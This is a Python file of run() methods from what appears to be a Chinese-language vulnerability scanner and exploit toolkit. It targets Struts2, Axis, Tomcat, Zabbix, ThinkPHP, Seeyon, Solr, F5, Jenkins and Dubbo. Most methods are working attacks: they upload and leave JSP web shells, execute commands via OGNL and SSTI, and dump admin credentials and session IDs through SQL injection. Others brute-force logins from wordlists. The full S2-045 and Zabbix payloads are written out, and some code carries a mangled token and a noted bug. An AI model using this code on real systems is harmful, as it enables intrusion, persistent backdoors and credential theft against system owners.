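def run(self):
    """Axis ``AdminService`` exposure probe followed by an upload echo check.

    A GET on ``/services/AdminService`` must answer 200 with
    ``processing</Admin>`` in the body; ``self.shell_payload`` is then POSTed to
    ``/services/RandomService`` and the page at ``self.url + "../shell.jsp"`` is
    asked to echo ``self.capta``.

    Side effects: ``self.url`` gains an ``http://`` scheme when missing; on a
    vulnerable target a file is written and left behind.

    Returns:
        True when the echo is seen, False on either failed stage or on any
        exception (printed). The original returned None on the success and
        one failure path; callers now always get a bool.
    """
    # "https" already starts with "http", so one prefix test covers both.
    if not self.url.startswith("http"):
        self.url = "http://" + self.url
    try:
        check_req = request.get(self.url + "/services/AdminService",
                                headers=self.check_headers,
                                data=self.check_payload)
        if not (check_req.status_code == 200
                and "processing</Admin>" in check_req.text):
            print("不存在Axis漏洞!")
            return False
        print("存在Axis漏洞")
        # The upload response is not inspected; the echo below is the verdict.
        request.post(self.url + "/services/RandomService",
                     data=self.shell_payload, headers=self.shell_headers)
        # NOTE(review): ".." is appended with no "/" separator, so the final
        # path depends on how self.url ends — confirm against the callers.
        shell_url = self.url + "../shell.jsp"
        cmd_req = request.get(shell_url + "?c=echo%20" + self.capta,
                              headers=self.headers)
        if cmd_req.status_code == 200 and self.capta in cmd_req.text:
            print("上传的jsp文件路径为:", shell_url)
            return True
        return False
    except Exception as e:
        print(e)
        return False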
def run(self):
    """S2-005 probe.

    The check payload is fetched as a stream and only the first 50 raw bytes
    are examined for ``self.capta``; on a hit the command payload is fetched
    the same way and its first 50 bytes are printed.

    Side effects: ``self.url`` gains an ``http://`` scheme when missing and a
    ``/example/HelloWorld.action`` suffix when it contains no ``.action``.

    Returns:
        True on a hit, False otherwise or on any exception (printed).
    """
    target = self.url
    if not target.startswith("http"):
        target = "http://" + target
    if '.action' not in target:
        target += '/example/HelloWorld.action'
    self.url = target

    def first_bytes(path):
        # Stream so that no more than 50 bytes of the body are pulled.
        resp = request.get(target + path, headers=self.headers, stream=True)
        return resp.raw.read(50).decode(encoding='utf-8')

    try:
        if self.capta not in first_bytes(self.check_payload):
            return False
        print('执行whoami命令成功,结果为:', first_bytes(self.cmd_payload))
        return True
    except Exception as e:
        print(e)
        return False
def run(self):
    """S2-013 probe.

    The check payload's response characters are passed through
    ``self.filter``; a hit requires a 200, a filtered result shorter than
    100 characters and ``self.capta`` inside it. The command payload is then
    fetched, filtered the same way and printed.

    Side effects: ``self.url`` gains an ``http://`` scheme when missing and a
    ``/link.action`` suffix when it contains no ``.action``.

    Returns:
        True on a hit, False otherwise or on any exception (printed).
    """
    try:
        if not self.url.startswith("http"):
            self.url = "http://" + self.url
        if '.action' not in self.url:
            self.url += '/link.action'

        def fetch_filtered(path):
            # No headers are sent here, matching the original requests.
            resp = request.get(self.url + path)
            return resp, self.filter(list(resp.text))

        check_res, check_str = fetch_filtered(self.check_payload)
        hit = (check_res.status_code == 200
               and len(check_str) < 100
               and self.capta in check_str)
        if not hit:
            return False
        _, cmd_str = fetch_filtered(self.cmd_payload)
        print('存在S2-013漏洞,执行whoami命令成功,执行结果是:', cmd_str)
        return True
    except Exception as e:
        print(e)
        return False
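def run(self):
    """S2-057 probe with two candidate payloads.

    Both ``check_payload`` and ``check_payload1`` are requested. The one that
    answers 200 with ``self.capta`` in its body — while the other does not
    answer 200 — selects the matching command payload, whose body is printed.

    Side effects: ``self.url`` gains an ``http://`` scheme when missing.

    Returns:
        True when either candidate hits, False otherwise or on any exception
        (printed).
    """
    try:
        if not self.url.startswith("http"):
            self.url = "http://" + self.url
        check_req = request.get(self.url + self.check_payload)
        check_req1 = request.get(self.url + self.check_payload1)

        def hit(resp, other):
            return (resp.status_code == 200 and self.capta in resp.text
                    and other.status_code != 200)

        # Fix: the second branch used to search check_req.text — the response
        # it simultaneously required to be non-200 — instead of check_req1.text.
        if hit(check_req, check_req1):
            cmd_payload = self.cmd_payload
        elif hit(check_req1, check_req):
            cmd_payload = self.cmd_payload1
        else:
            print('不存在S2-057漏洞')
            return False
        cmd_req = request.get(self.url + cmd_payload)
        print('存在S2-057漏洞,执行whoami命令成功,执行结果是:', cmd_req.text)
        return True
    except Exception as e:
        print(e)
        return False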
def run(self):
    """S2-052 probe.

    The check payload is POSTed to ``self.url``; ``/check.txt`` is then read
    from the host root (always ``http://``, built from the parsed hostname and
    port) and must answer 200 with ``self.capta`` in it. On a hit the command
    payload is POSTed the same way and ``/cmd.txt`` is printed.

    Side effects: ``self.url`` gains an ``http://`` scheme when missing.

    Returns:
        True on a hit, False otherwise or on any exception (printed).
    """
    if not self.url.startswith("http"):
        self.url = "http://" + self.url
    try:
        request.post(self.url, headers=self.headers, data=self.check_payload)
        parsed = urlparse(self.url)
        # %s applies str(); a missing port therefore renders as "None",
        # exactly as the original concatenation did.
        root = 'http://%s:%s' % (parsed.hostname, parsed.port)
        probe = request.get(root + '/check.txt', headers=self.headers)
        if probe.status_code != 200 or self.capta not in probe.text:
            return False
        request.post(self.url, headers=self.headers, data=self.cmd_payload)
        output = request.get(root + '/cmd.txt', headers=self.headers)
        print('存在S2-052漏洞,执行whoami的结果为:', output.text)
        return True
    except Exception as e:
        print(e)
        return False
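def run(self):
    """Jenkins user-enumeration check via the ``securityRealm`` search page.

    The search page must echo the query (``Search for '<capta>'``); every
    name in ``app/username.txt`` is then searched and those whose page shows
    ``Jenkins User ID`` are printed.

    Side effects: ``self.url`` gains an ``http://`` scheme when missing;
    matches are printed, not returned.

    Returns:
        True when the search page echoes the query (regardless of how many
        users matched), False otherwise or when the initial request fails
        (printed).
    """
    if not self.url.startswith("http"):
        self.url = "http://" + self.url
    search = self.url + "/securityRealm/user/admin/search/index?q="
    try:
        check_req = request.get(search + self.capta, headers=self.headers)
        if "Search for '%s'" % (self.capta) not in check_req.text:
            print('不存在Jenkins用户枚举漏洞')
            return False
        print('存在Jenkins用户枚举漏洞')
        # Context manager so the wordlist handle is closed (the original
        # leaked it); a failing per-user request is printed and skipped.
        with open('app/username.txt', 'r', encoding='utf-8') as wordlist:
            for user in wordlist:
                user = user.strip()
                try:
                    result_req = request.get(search + user, headers=self.headers)
                    if 'Jenkins User ID' in result_req.text:
                        print(user)
                except Exception as e:
                    print(e)
        return True
    except Exception as e:
        print(e)
        print('不存在Jenkins用户枚举漏洞')
        return False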
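def run(self):
    """Tomcat manager weak-credential check.

    Only proceeds when the root page is the stock welcome page
    ("installed Tomcat. Congratulations!"). Every ``app/username.txt`` /
    ``app/password.txt`` pair is then sent as HTTP Basic auth to
    ``/manager/html`` until a response contains
    "Tomcat Web Application Manager".

    Side effects: ``self.url`` gains an ``http://`` scheme when missing;
    ``self.headers["Authorization"]`` is overwritten on every attempt and left
    at the last value tried.

    Returns:
        True on the first accepted pair (printed), False otherwise or on any
        exception (printed).
    """
    if not self.url.startswith("http"):
        self.url = "http://" + self.url
    try:
        check_req = request.get(self.url, headers=self.headers)
        if "installed Tomcat. Congratulations!" not in check_req.text:
            print('不存在Tomcat 弱口令漏洞')
            return False
        # Read both wordlists once; the original re-opened password.txt for
        # every user and never closed either handle.
        with open('app/username.txt', 'r', encoding='utf-8') as f:
            users = [line.strip() for line in f]
        with open('app/password.txt', 'r', encoding='utf-8') as f:
            # `line != ''` mirrors the original filter (file lines carry a
            # newline, so it only ever skips a literally empty read).
            passwords = [line.strip() for line in f if line != '']
        manager = self.url + '/manager/html'
        for user in users:
            for pwd in passwords:
                token = base64.b64encode(
                    ("%s:%s" % (user, pwd)).encode('utf-8')).decode('utf-8')
                self.headers["Authorization"] = "Basic " + token
                result_req = request.get(manager, headers=self.headers)
                if "Tomcat Web Application Manager" in result_req.text:
                    print('存在Tomcat 弱口令漏洞,账号密码为:', user, pwd)
                    return True
        print('不存在Tomcat 弱口令漏洞')
        return False
    except Exception as e:
        print(e)
        print('不存在Tomcat 弱口令漏洞')
        return False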
def run(self):
    """Zabbix ``jsrpc.php`` ``profileIdx2`` SQL-injection check (CVE-2016-10134).

    Flow: a baseline request with ``profileIdx2=999'`` is made (its body is
    stored in ``check_response`` but never inspected); two further requests
    carry an error-based injection in ``profileIdx2`` and the MySQL
    ``Duplicate entry '~...~1`` error text is scraped — first a ``name:passwd``
    pair from ``users``, then a ``sessionid`` from ``sessions``. Both values
    are printed.

    The ``sid``, ``timestamp`` and ``itemids`` query values are hard-coded
    constants from the original tool. The ``×tamp`` token inside all three
    URLs is reproduced exactly as it appears in this listing.

    Side effects: ``self.url`` gains an ``http://`` scheme when missing;
    credentials and a session id are written to stdout.

    Returns:
        True when both scrapes matched; False on any exception — including
        the IndexError raised when a regex finds nothing, which is the only
        path to the "not vulnerable" message.
    """
    if not self.url.startswith("http") and not self.url.startswith("https"):
        self.url = "http://" + self.url
    url = self.url + "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=999'&updateProfile=true&screenitemid=.=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1"
    try:
        check_req = request.get(url, headers=self.headers)
        # Unused: the baseline response is fetched but never examined.
        check_response = check_req.text
        sql_url = self.url + "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select concat(name,0x3a,passwd) from users limit 0,1),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)&updateProfile=true&screenitemid=.=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1"
        sql_req = request.get(sql_url, headers=self.headers)
        # The injected value is wrapped in 0x7e ("~") so it can be cut out of
        # the duplicate-key error message.
        sql_result_reg = re.compile(r"Duplicate\s*entry\s*'~(.+?)~1")
        sql_results = sql_result_reg.findall(sql_req.text)
        # IndexError here (no match) is what routes to the except branch.
        print('存在CVE-2016-10134漏洞,管理员、用户名密码为:', sql_results[0])
        session_url = self.url + "/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select sessionid from sessions limit 0,1),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)&updateProfile=true&screenitemid=.=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1"
        session_req = request.get(session_url,
                                  headers=self.headers)
        session_result_reg = re.compile(r"Duplicate\s*entry\s*'~(.+?)~1")
        session_results = session_result_reg.findall(session_req.text)
        print('SessionID为:' + session_results[0])
        return True
    except Exception as e:
        # The caught exception is deliberately not printed here.
        #print(e)
        print('不存在CVE-2016-10134漏洞')
        return False
    finally:
        pass
def run(self):
    """S2-045 style Content-Type OGNL probe using an arithmetic oracle.

    Two random 8-digit integers are summed locally; the injected expression
    asks the target to compute the same sum (``set /a`` on Windows, ``expr``
    otherwise) and stream the process output into the response. The probe is
    positive only when the decimal sum appears in the body, so an ordinary
    page cannot produce a false positive by accident.

    Note: unlike the sibling ``run`` methods this one tests for ``'://'``
    rather than an ``http`` prefix when normalising ``self.url``. The
    ``#[email protected]@...`` token in the payload looks like a mangled token from
    the page this listing was taken from; it is left exactly as found.

    Returns:
        True when the sum is echoed back, False otherwise or on any exception
        (printed).
    """
    if '://' not in self.url:
        self.url = 'http://' + self.url
    try:
        a = random.randint(10000000, 20000000)
        b = random.randint(10000000, 20000000)
        # Expected oracle value; only its decimal form is searched for.
        c = a + b
        win = 'set /a ' + str(a) + ' + ' + str(b)
        linux = 'expr ' + str(a) + ' + ' + str(b)
        header = dict()
        header["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
        header["Content-Type"] = "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#iswin?(#cmd='" + win + "'):(#cmd='" + linux + "')).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
        req = request.get(self.url, headers=header)
        if str(c) in req.text:
            return True
        else:
            return False
    except Exception as e:
        print(e)
        return False
    finally:
        pass
def run(self):
    """Report whether the check payload's response, with newlines removed,
    contains ``self.capta``.

    Side effects: ``self.url`` gains an ``http://`` scheme when missing and a
    ``/example/HelloWorld.action`` suffix when it contains no ``.action``.

    Returns:
        True on a match, False otherwise or on any exception (printed).
    """
    if not self.url.startswith("http"):
        self.url = "http://" + self.url
    if '.action' not in self.url:
        self.url += '/example/HelloWorld.action'
    try:
        body = request.get(self.url + self.check_payload, headers=self.headers).text
        return self.capta in body.replace('\n', '')
    except Exception as e:
        print(e)
        return False
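def get_title(self, url):
    """Fetch *url* and return its ``<title>`` text and ``Server`` header.

    The page encoding is sniffed with ``chardet`` so non-UTF-8 (e.g. GBK)
    titles decode correctly.

    Args:
        url: absolute URL to fetch.

    Returns:
        ``(title, banner)``. Either element is ``''`` when absent; both are
        ``''`` when the request or the decode fails (the error is printed,
        not raised).
    """
    try:
        req = request.get(url)
        # chardet returns None for an undecidable byte string; fall back to
        # utf-8 rather than passing None to decode().
        detected = chardet.detect(req.content)['encoding'] or 'utf-8'
        pagecode = req.content.decode(detected)
        matches = re.findall('<title>(.*?)</title>', pagecode, re.S)
        # The original left `title` unbound when no <title> matched.
        title = matches[0] if matches else ''
        # A missing Server header no longer raises KeyError.
        banner = req.headers.get('server', '')
        return title, banner
    except Exception as e:
        print(e)
        return '', ''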
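def run(self):
    """Dubbo HTTP Basic weak-credential check.

    Only proceeds when the root response carries
    ``WWW-Authenticate: Basic realm="dubbo"``; every ``app/username.txt`` /
    ``app/password.txt`` pair is then sent as Basic auth and the first 200
    response wins.

    Side effects: ``self.url`` gains an ``http://`` scheme when missing;
    ``self.headers['Authorization']`` is overwritten per attempt.

    Returns:
        True on the first accepted pair, False otherwise or on any exception
        (the "not vulnerable" message is printed on every negative path).
    """
    if not self.url.startswith("http"):
        self.url = "http://" + self.url
    try:
        req = request.get(self.url, headers=self.headers)
        if req.headers["www-authenticate"] != "Basic realm=\"dubbo\"":
            print('不存在Dubbo弱口令漏洞')
            return False
        with open('app/username.txt', 'r', encoding='utf-8') as f:
            users = [line.strip() for line in f]
        with open('app/password.txt', 'r', encoding='utf-8') as f:
            passwords = [line.strip() for line in f if line != '']
        for user in users:
            for pwd in passwords:
                # Fixes: b64encode needs bytes (the original passed a str and
                # always raised), and the retry targets self.url — the
                # original referenced an undefined `url` through a separate
                # `requests` session.
                token = base64.b64encode(
                    (user + ":" + pwd).encode('utf-8')).decode('utf-8')
                self.headers['Authorization'] = 'BASIC ' + token
                resp = request.get(self.url, headers=self.headers)
                if resp.status_code == 200:
                    print('存在Dubbo弱口令漏洞')
                    return True
        # Wordlists exhausted; the original fell through with None here.
        print('不存在Dubbo弱口令漏洞')
        return False
    except Exception:
        print('不存在Dubbo弱口令漏洞')
        return False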
def send_exp(self, exp_url):
    """Solr RCE probe against one base URL.

    ``exp_url + self.check_payload`` must answer 200 with ``self.capta`` in
    the body; the command payload is then fetched, its body printed and
    ``self.flag`` set to True. Nothing is returned — the flag is the result
    channel.

    Args:
        exp_url: base URL to probe.
    """
    try:
        probe = request.get(exp_url + self.check_payload, headers=self.headers)
        if probe.status_code != 200 or self.capta not in probe.text:
            print("不存在Solr远程代码执行漏洞")
            return
        output = request.get(exp_url + self.cmd_payload, headers=self.headers)
        print("存在Solr远程代码执行漏洞,执行whoami结果是:", output.text)
        self.flag = True
    except Exception as e:
        print(e)
        print("不存在Solr远程代码执行漏洞")
def run(self):
    """S2-037 probe: when the check payload's body contains ``self.capta``,
    fetch the command payload and print its body.

    Side effects: ``self.url`` gains an ``http://`` scheme when missing.

    Returns:
        True on a hit, False otherwise or on any exception (printed).
    """
    if not self.url.startswith("http"):
        self.url = "http://" + self.url

    def fetch(path):
        return request.get(self.url + path, headers=self.headers)

    try:
        if self.capta not in fetch(self.check_payload).text:
            print('不存在S2-037漏洞!')
            return False
        print('存在S2-037漏洞,执行whoami命令成功,结果为:', fetch(self.cmd_payload).text)
        return True
    except Exception as e:
        print(e)
        return False
def check(self):
    """Return True when the target exposes an HSQLDB endpoint.

    Three probes run in order and the first hit wins: ``self.check_payload``
    (body mentions ``password_policy_table``), then ``/hsqldb;`` and
    ``/hsqldb%0a`` (200 with "HSQL Database Engine" in the body). There is
    no exception handling — request errors propagate to the caller.
    """
    first = request.get(self.url + self.check_payload, headers=self.headers)
    if 'password_policy_table' in first.text:
        return True
    for suffix in ('/hsqldb;', '/hsqldb%0a'):
        resp = request.get(self.url + suffix, headers=self.headers)
        if resp.status_code == 200 and 'HSQL Database Engine' in resp.text:
            return True
    return False
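def run(self):
    """Detect whether ``self.url`` forwards requests as an open HTTP proxy.

    The address shown by ``www.net.cn``'s "your IP" page is fetched directly
    and again through ``self.url`` as an HTTP proxy; a different address means
    the target forwarded the request on the caller's behalf.

    Side effects: contacts a third-party site; prints the verdict.

    Returns:
        True when the two addresses differ, False when they match or when
        either lookup fails. (The original returned None on both non-error
        paths.)
    """
    url = "http://www.net.cn/static/customercare/yourip.asp"
    pattern = re.compile('<h2>(.*?)</h2')
    try:
        local_ip = pattern.findall(request.get(url).text)[0]
        proxy_ip = pattern.findall(
            request.get(url, proxies={'http': self.url}).text)[0]
        if local_ip != proxy_ip:
            print('存在Nginx反向代理可访问内网漏洞')
            return True
        print('不存在Nginx反向代理可访问内网漏洞')
        return False
    except Exception:
        # A missing <h2> (IndexError) or any request failure lands here.
        print('不存在Nginx反向代理可访问内网漏洞')
        return False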
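def run(self):
    """Seeyon ``htmlofficeservlet`` probe.

    A GET on ``/seeyon/htmlofficeservlet`` must answer 200 with the
    "DBSTEP V3.0 0 21 0 htmoffice operate err" marker; ``self.payload`` is
    then POSTed there and the fixed ``test123456.jsp`` page is requested with
    an echo command whose token must appear in the body.

    Side effects: ``self.url`` gains an ``http://`` scheme when missing; on
    a vulnerable target a file is written and left behind.

    Returns:
        True when the echo is seen, False on either failed stage or on any
        exception (printed). The original returned None on one failure path.
    """
    if not self.url.startswith("http"):
        self.url = "http://" + self.url
    servlet = self.url + "/seeyon/htmlofficeservlet"
    page = self.url + "/seeyon/test123456.jsp?pwd=asasd3344&cmd=echo asasd3344"
    try:
        check_req = request.get(servlet, headers=self.headers)
        if not (check_req.status_code == 200
                and "DBSTEP V3.0 0 21 0 htmoffice operate err" in check_req.text):
            print("不存在seeyou漏洞")
            return False
        print("存在seeyou漏洞")
        request.post(servlet, data=self.payload, headers=self.headers)
        cmd_req = request.get(page, headers=self.headers)
        if cmd_req.status_code == 200 and "asasd3344" in cmd_req.text:
            print("上传的jsp文件路径为:", page)
            return True
        print("不存在seeyou漏洞")
        return False
    except Exception as e:
        print(e)
        return False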
def get_kibana_version(self):
    """Populate ``self.version`` from ``/app/kibana``.

    The page is fetched with a browser User-Agent and ``self.url`` as
    Referer; the first ``"version":"..."`` match is stored. ``self.version``
    is left untouched when nothing matches, and request errors propagate.
    """
    headers = {
        'Referer': self.url,
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0',
    }
    body = request.get(self.url + "/app/kibana", headers=headers).text
    # The original scanned the same pattern twice; a single scan is equivalent.
    found = re.findall('"version":"(.*?)",', body)
    if found:
        self.version = found[0]
def check_url(self, url):
    """Return *url* when it answers 200 with "GlassFish" in the body.

    Returns False otherwise, and also when the request raises (the error is
    swallowed).
    """
    try:
        resp = request.get(url, headers=self.headers)
        looks_like_glassfish = resp.status_code == 200 and "GlassFish" in resp.text
        return url if looks_like_glassfish else False
    except Exception:
        return False
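def run(self):
    """Tomcat PUT (CVE-2017-12615) probe.

    ``self.check_file`` is PUT to ``/test.jsp/`` (trailing-slash form) and
    must read back as exactly ``'test'`` with a 200; only then is
    ``self.shell_file`` PUT to ``/shell.jsp/`` and read back.

    Side effects: ``self.url`` gains an ``http://`` scheme when missing; on
    a vulnerable target both files are written and left behind (no cleanup).

    Returns:
        True when ``/shell.jsp`` reads back with 200, False on either failed
        stage or on any exception (printed). The original returned None on
        one failure path.
    """
    if not self.url.startswith("http"):
        self.url = "http://" + self.url
    try:
        request.put(self.url + "/test.jsp/", data=self.check_file, headers=self.headers)
        probe = request.get(self.url + "/test.jsp", headers=self.headers)
        if probe.status_code != 200 or probe.text != 'test':
            print("不存在CVE-2017-12615漏洞")
            return False
        request.put(self.url + "/shell.jsp/", data=self.shell_file, headers=self.headers)
        readback = request.get(self.url + "/shell.jsp", headers=self.headers)
        if readback.status_code == 200:
            print("存在CVE-2017-12615漏洞,shell文件路径为:" + self.url + "/shell.jsp")
            return True
        print("不存在CVE-2017-12615漏洞")
        return False
    except Exception as e:
        print(e)
        return False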
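def checkfile(self, file_path):
    """Return True when *file_path* answers anything other than 404.

    Prints the PUT target being verified (``self.put_file_path``) first;
    the request itself goes to *file_path* — presumably the readable URL of
    that PUT, TODO confirm against the callers.

    Returns:
        True for any status except 404, False for 404 or when the request
        fails (printed; the original returned None there).
    """
    try:
        print("[+]Trying PUT.." + self.put_file_path)
        resp = request.get(file_path, headers=self.headers)
        # `== 200 or != 404` reduced to the condition it actually tests.
        return resp.status_code != 404
    except Exception as e:
        print("Check File : Wrong")
        print(e)
        return False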
def cmd(self):
    """Run ``whoami`` through the ``tmui`` ``tmshCmd.jsp`` / ``fileSave`` /
    ``fileRead`` chain and report success.

    Steps, each gated on a 200 whose response headers (serialised via
    ``headers.__dict__['_store']``) mention ``tmui``: create the ``bash`` cli
    alias, save a file built from ``self.filesave_payload`` with ``whoami``,
    read it back through ``self.list_payload`` (a body longer than 33 bytes is
    parsed as JSON and its ``output`` taken), then delete it via
    ``self.delete_payload``. The command output itself is discarded — the
    ``return command_result`` line is commented out.

    NOTE(review): this listing arrived on a single line; the nesting below is
    a reconstruction. As reconstructed, a False ``self.check()`` falls off the
    end and returns None rather than False.

    Returns:
        True when the full chain completes, False on any failed gate or on
        any exception (swallowed).
    """
    try:
        if self.check():
            cmd_url = self.url + "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash"
            cmd_req = request.get(cmd_url)
            # Gate on the serialised response headers, not the body.
            cmd_str = json.dumps(cmd_req.headers.__dict__['_store'])
            if cmd_req.status_code == 200 and 'tmui' in cmd_str:
                filesave_req = request.get(
                    self.url + self.filesave_payload.format(self.file, 'whoami'))
                filesave_str = json.dumps(
                    filesave_req.headers.__dict__['_store'])
                if filesave_req.status_code == 200 and 'tmui' in filesave_str:
                    list_req = request.get(self.url + self.list_payload)
                    list_str = json.dumps(
                        list_req.headers.__dict__['_store'])
                    if list_req.status_code == 200 and 'tmui' in list_str:
                        # 33 is an empirical minimum body length — presumably
                        # the size of an empty-output reply; confirm.
                        if len(list_req.text) > 33:
                            command_result = json.loads(
                                list_req.text)['output']
                            # Clean-up request; its result is serialised but
                            # never checked.
                            delete_req = request.get(self.url + self.delete_payload)
                            response_str = json.dumps(
                                delete_req.headers.__dict__['_store'])
                            # return command_result
                            return True
                    return False
                else:
                    return False
            else:
                return False
    except Exception as e:
        return False
    finally:
        pass
def run(self):
    """IIS short-filename (8.3 tilde) disclosure check.

    Two probes are compared: ``/san1e*~1****/a.aspx`` should answer 400 and
    ``/*~1****/a.aspx`` should answer 404 on an affected server.

    Side effects: ``self.url`` gains an ``http://`` scheme when missing.

    Returns:
        True on the 400/404 pair, False otherwise or on any exception
        (printed).
    """
    if not self.url.startswith("http"):
        self.url = "http://" + self.url
    probes = ("/san1e*~1****/a.aspx", "/*~1****/a.aspx")
    try:
        codes = [request.get(self.url + p, headers=self.headers).status_code
                 for p in probes]
        vulnerable = codes == [400, 404]
    except Exception as e:
        print(e)
        vulnerable = False
    print('存在IIS短文件名漏洞' if vulnerable else '不存在IIS短文件名漏洞')
    return vulnerable
def run(self):
    """ThinkPHP 5.0.22/5.1.29 RCE probe.

    Side effects: ``self.url`` gains an ``http://`` scheme when missing;
    ``self.check_url`` and ``self.cmd_url`` are stored on the instance (the
    latter only after a positive check).

    Returns:
        True on a 200 containing ``self.capta`` (the command output, newlines
        stripped, is printed), False otherwise or on any exception (printed).
    """
    try:
        if not self.url.startswith("http"):
            self.url = "http://" + self.url
        self.check_url = self.url + self.check_payload
        probe = request.get(self.check_url, headers=self.headers)
        if probe.status_code != 200 or self.capta not in probe.text:
            print('不存在ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞')
            return False
        self.cmd_url = self.url + self.cmd_payload
        output = request.get(self.cmd_url, headers=self.headers).text
        print('存在ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞,执行whoami命令成功,执行结果是:', output.replace('\n', ''))
        return True
    except Exception as e:
        print(e)
        return False
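def check_jar_exsits(self):
    """Look up an uploaded jar in the ``/jars/`` listing.

    Returns:
        The listing's ``id`` of the first entry whose id ends with
        ``self.upload_jar_name``; False when the listing is not a 200 JSON
        response, has no such entry, or the request/parse fails (printed).
        The original returned None rather than False on the no-match path.
    """
    list_jar_url = self.url + "/jars/"
    try:
        response = request.get(list_jar_url, headers=self.headers)
        is_json = "application/json" in response.headers.get("Content-Type", "")
        if response.status_code == 200 and is_json:
            for upload_file in json.loads(response.text)['files']:
                if str(upload_file['id']).endswith('{}'.format(self.upload_jar_name)):
                    return upload_file['id']
    except Exception as e:
        print(e)
    return False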
def run(self):
    """Flask/Jinja2 SSTI probe.

    The check payload must come back as exactly ``'Hello 54289'`` with a
    200; the command payload is then fetched and its body (newlines stripped)
    printed.

    Side effects: ``self.url`` gains an ``http://`` scheme when missing.

    Returns:
        True on a hit, False otherwise or on any exception (printed).
    """
    try:
        if not self.url.startswith("http"):
            self.url = "http://" + self.url
        probe = request.get(self.url + self.check_payload, headers=self.headers)
        hit = probe.text == 'Hello 54289' and probe.status_code == 200
        if not hit:
            print('不存在Flask SSTI漏洞')
            return False
        print('存在Flask SSTI漏洞,执行whoami命令结果为:')
        output = request.get(self.url + self.cmd_payload, headers=self.headers)
        print(output.text.replace('\n', ''))
        return True
    except Exception as e:
        print(e)
        return False
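def check(self):
    """Classify anonymous access to a Jenkins instance.

    Three probes run in order and one of the class constants is returned:
    ``READ_ENABLE`` when the root page is readable anonymously (200 with
    "adjuncts"); ``READ_BYPASS`` when ``/securityRealm/user/admin`` is
    readable (CVE-2018-1000861 ACL bypass); ``NOT_JENKINS`` when that bypass
    probe fails; ``ENTRY_NOTFOUND`` when an accessible instance answers 404
    for the SecureGroovyScript ``checkScript`` descriptor (CVE-2019-1003005);
    ``ACL_PATCHED`` when nothing succeeds or a request raises (printed).

    Note: the bypass probe always runs, so it overrides an earlier
    READ_ENABLE with READ_BYPASS or NOT_JENKINS — the original ordering,
    kept as is.

    Side effects: ``self.url`` gains an ``http://`` scheme when missing.
    """
    if not self.url.startswith("http"):
        self.url = "http://" + self.url
    flag, accessible = self.ACL_PATCHED, False
    user_admin = self.url + '/securityRealm/user/admin'
    entry_path = ('/descriptorByName/org.jenkinsci.plugins.scriptsecurity.'
                  'sandbox.groovy.SecureGroovyScript/checkScript')
    try:
        # ANONYMOUS_READ
        root = request.get(self.url, headers=self.headers)
        if root.status_code == 200 and 'adjuncts' in root.text:
            flag, accessible = self.READ_ENABLE, True
            print('ANONYMOUS_READ enable!')
        elif root.status_code == 403:
            print('ANONYMOUS_READ disable!')
        # ACL bypass, CVE-2018-1000861
        bypass = request.get(user_admin, headers=self.headers)
        if bypass.status_code == 200 and 'adjuncts' in bypass.text:
            flag, accessible = self.READ_BYPASS, True
        else:
            flag = self.NOT_JENKINS
        # Entry point, CVE-2019-1003005
        if accessible:
            # Fix: the original computed this base (the user page when the
            # bypass is needed, the root otherwise) and then ignored it,
            # always probing from self.url.
            base = user_admin if flag is self.READ_BYPASS else self.url
            entry = request.get(base + entry_path, headers=self.headers)
            if entry.status_code == 404:
                flag = self.ENTRY_NOTFOUND
    except Exception as e:
        print(e)
    return flag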
def xml_url():
    """Fetch ``/vpn/../vpns/portal/<self.cdl>.xml`` and print it on a 200.

    Closure: ``self`` (``url``, ``cdl``) and ``cmd`` are free variables bound
    by the enclosing function, which is outside this listing — confirm they
    are defined there. Prints the URL, the command and the part of the body
    before the first ``"u"``; nothing is returned.
    """
    xml_url = self.url + '/vpn/../vpns/portal/%s.xml' % self.cdl
    headers = {
        'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)',
        'NSC_USER': '******',
        'NSC_NONCE': 'nsroot'
    }
    req = request.get(xml_url, headers=headers)
    if req.status_code == 200:
        print('Xml_Url=', xml_url)
        print('Command=', cmd)
        # NOTE(review): req.content is bytes; bytes.split() with a str
        # separator raises TypeError on Python 3 — presumably req.text was
        # meant. Left as found.
